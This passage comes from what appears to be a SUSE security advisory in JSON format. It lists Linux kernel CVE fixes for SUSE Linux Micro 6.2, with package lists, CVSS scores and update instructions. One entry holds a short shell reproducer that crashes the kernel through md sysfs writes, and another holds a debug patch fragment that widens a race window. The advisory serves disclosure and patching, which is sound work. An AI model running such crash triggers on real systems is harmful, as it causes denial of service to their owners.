sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68368",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68368"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: init bioset in mddev_init\n\nIO operations may be needed before md_run(), such as updating metadata\nafter writing sysfs. Without bioset, this triggers a NULL pointer\ndereference as below:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000020\n Call Trace:\n md_update_sb+0x658/0xe00\n new_level_store+0xc5/0x120\n md_attr_store+0xc9/0x1e0\n sysfs_kf_write+0x6f/0xa0\n kernfs_fop_write_iter+0x141/0x2a0\n vfs_write+0x1fc/0x5a0\n ksys_write+0x79/0x180\n __x64_sys_write+0x1d/0x30\n x64_sys_call+0x2818/0x2880\n do_syscall_64+0xa9/0x580\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\nReproducer\n```\n mdadm -CR /dev/md0 -l1 -n2 /dev/sd[cd]\n echo inactive \u003e /sys/block/md0/md/array_state\n echo 10 \u003e /sys/block/md0/md/new_level\n```\n\nmddev_init() can only be called once per mddev, no need to test if bioset\nhas been initialized anymore.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68368",
"url": "https://www.suse.com/security/cve/CVE-2025-68368"
},
{
"category": "external",
"summary": "SUSE Bug 1255527 for CVE-2025-68368",
"url": "https://bugzilla.suse.com/1255527"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68368"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
